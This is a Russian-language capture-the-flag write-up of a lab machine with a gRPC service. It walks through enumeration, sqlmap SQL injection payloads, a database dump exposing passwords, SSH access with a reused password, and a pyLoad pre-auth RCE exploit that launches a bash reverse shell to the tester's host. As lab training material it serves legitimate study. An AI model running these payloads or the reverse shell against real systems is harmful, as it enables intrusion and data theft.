Обзор сервисов
IP-адрес: 10.10.11.214
. Посмотрим, что покажет nmap:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 14:31 EDT
Nmap scan report for 10.10.11.214
Host is up (0.052s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
| 256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_ 256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 143.21 seconds
$ nc 10.10.11.214 50051
▒?��?�� ?
Похоже на gRPC сервис.
gRPC
Воспользуемся grpc_cli. Инструкции по сборке тут:
- https://github.com/grpc/grpc/blob/master/BUILDING.md
- https://github.com/grpc/grpc/blob/master/doc/command_line_tool.md
Получим информацию о приложении и методах.
$ ./grpc_cli ls 10.10.11.214:50051
SimpleApp
grpc.reflection.v1alpha.ServerReflection
$ ./grpc_cli ls 10.10.11.214:50051 SimpleApp -l
filename: app.proto
service SimpleApp {
rpc LoginUser(LoginUserRequest) returns (LoginUserResponse) {}
rpc RegisterUser(RegisterUserRequest) returns (RegisterUserResponse) {}
rpc getInfo(getInfoRequest) returns (getInfoResponse) {}
}
$ ./grpc_cli type 10.10.11.214:50051 LoginUserRequest
message LoginUserRequest {
string username = 1;
string password = 2;
}
$ ./grpc_cli type 10.10.11.214:50051 RegisterUserRequest
message RegisterUserRequest {
string username = 1;
string password = 2;
}
$ ./grpc_cli type 10.10.11.214:50051 getInfoRequest
message getInfoRequest {
string id = 1;
}
Попытаемся выполнить каждый метод.
$ ./grpc_cli call 10.10.11.214:50051 RegisterUser "username: 'user', password: 'user'"
connecting to 10.10.11.214:50051
message: "Account created for user user!"
Rpc succeeded with OK status
$ ./grpc_cli call 10.10.11.214:50051 LoginUser "username: 'user', password: 'user'"
connecting to 10.10.11.214:50051
message: "Your id is 767."
Received trailing metadata from server:
token : b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidXNlciIsImV4cCI6MTY4OTExMjA2Mn0.lTZieINh0j7CSujCGiIMM1EuQJY6ZcBXDlF7BqDNnyA'
Rpc succeeded with OK status
Похоже, что приложение написано на Python (NoneType).
./grpc_cli call 10.10.11.214:50051 getInfo "id: '1'" -metadata "token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"
connecting to 10.10.11.214:50051
Sending client initial metadata:
token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc
Rpc failed with status code 2, error message: Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptabl
./grpc_cli call 10.10.11.214:50051 getInfo "id: '424'" -metadata "token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"
connecting to 10.10.11.214:50051
Sending client initial metadata:
token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc
message: "Will update soon."
Rpc succeeded with OK status
Воспользуемся графическим представлением grpcui - https://github.com/fullstorydev/grpcui
./grpcui --plaintext 10.10.11.214:50051
token b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc'
grpcui
Попробуем подставить токен и залогиниться (как в предыдущем пункте).
Получили ошибку NoneType.
Сохраним запрос в BurpSuite под именем getInfo.req
, чтобы попытаться воспользоваться sqlmap:
Проверим в sqlmap:
$ sqlmap -r getinfo.req -p data --risk 3
...
sqlmap identified the following injection point(s) with a total of 239 HTTP(s) requests:
---
Parameter: JSON #2* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"-4808 OR 2579=2579"}]}
Type: time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"424 OR 9114=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"424 UNION ALL SELECT CHAR(113,122,98,118,113)||CHAR(117,121,85,73,86,98,115,69,99,86,109,104,100,76,118,103,115,81,99,85,120,82,77,68,81,80,105,120,72,107,69,72,117,74,84,110,108,119,110,84)||CHAR(113,112,118,118,113)-- wLwQ"}]}
---
...
Нашлась SQL Injection (union, boolean-based blind, time-based blind). Дампнем базу данных:
$ sqlmap -r getinfo.req -p data --risk 3 --dump-all
...
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| HereIsYourPassWord1431 | sau |
+------------------------+----------+
...
Table: messages
[1 entry]
+----+----------------------------------------------+----------+
| id | message | username |
+----+----------------------------------------------+----------+
| 1 | The admin is working hard to fix the issues. | admin |
+----+----------------------------------------------+----------+
...
SSH
Попытаемся переиспользовать пароль из базы для подключения к SSH.
$ ssh [email protected]
HereIsYourPassWord1431
-bash-5.0$ id
uid=1001(sau) gid=1001(sau) groups=1001(sau)
Пользовательский флаг
-bash-5.0$ ls -la
total 44
drwxr-xr-x 5 sau sau 4096 Jul 11 17:31 .
drwxr-xr-x 3 root root 4096 Jan 11 18:10 ..
lrwxrwxrwx 1 root root 9 Jan 11 18:08 .bash_history -> /dev/null
-rw-r--r-- 1 sau sau 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 sau sau 3771 Feb 25 2020 .bashrc
drwx------ 2 sau sau 4096 Jan 11 17:43 .cache
drwxrwxr-x 3 sau sau 4096 Jul 11 11:23 .local
-rw-r--r-- 1 sau sau 807 Feb 25 2020 .profile
drwx------ 2 sau sau 4096 Jul 11 11:01 .ssh
-rw------- 1 sau sau 1125 Jul 11 17:31 .viminfo
-rw-rw-r-- 1 sau sau 55 Jul 11 14:25 bash.sh
-rw-r----- 1 root sau 33 Jul 11 10:42 user.txt
-bash-5.0$ cat user.txt
ea0e2870b02b9c983ef9e371fb6e90e7
Повышение привилегий
Посмотрим, какие порты открыты. Видим приложение на порту 8000, смотрящее на 127.0.0.1.
-bash-5.0$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Перенаправим порт с помощью SSH.
$ ssh -L 127.0.0.1:8000:127.0.0.1:8000 [email protected]
HereIsYourPassWord1431
Посмотрим на сервис в браузере:
Для сервиса существует публичный эксплоит для RCE уязвимости без аутентификации: https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
# на удаленной машине
$ nano /tmp/r.sh
bash -i >& /dev/tcp/10.10.14.220/443 0>&1
# на своей машине
$ nc -lnvp 443
$ curl -i -s -k -X #x27;POST' --data-binary #x27;jk=pyimport%20os;os.system(\"bash%20/tmp/r.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' #x27;http://127.0.0.1:8000/flash/addcrypted2'
Флаг суперпользователя
root@pc:~# ls -la
total 68
drwx------ 7 root root 4096 Apr 27 15:32 .
drwxr-xr-x 21 root root 4096 Apr 27 15:23 ..
lrwxrwxrwx 1 root root 9 Jan 11 17:36 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4096 Apr 4 10:25 .cache
drwxr-xr-x 3 root root 4096 Apr 4 10:25 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
drwxr-xr-x 7 root root 4096 Jan 11 17:21 .pyload
-rw------- 1 root root 3203 Apr 27 15:32 .viminfo
drwxr-xr-x 3 root root 4096 Apr 27 13:15 Downloads
-rw-r----- 1 root root 33 Jul 11 10:42 root.txt
drwx------ 3 root root 4096 Jan 11 16:56 snap
-rw-r--r-- 1 root root 24576 Jan 11 17:57 sqlite.db.bak
root@pc:~# cat root.txt
f09c10a5010a1e5e4d2bed5a61c864de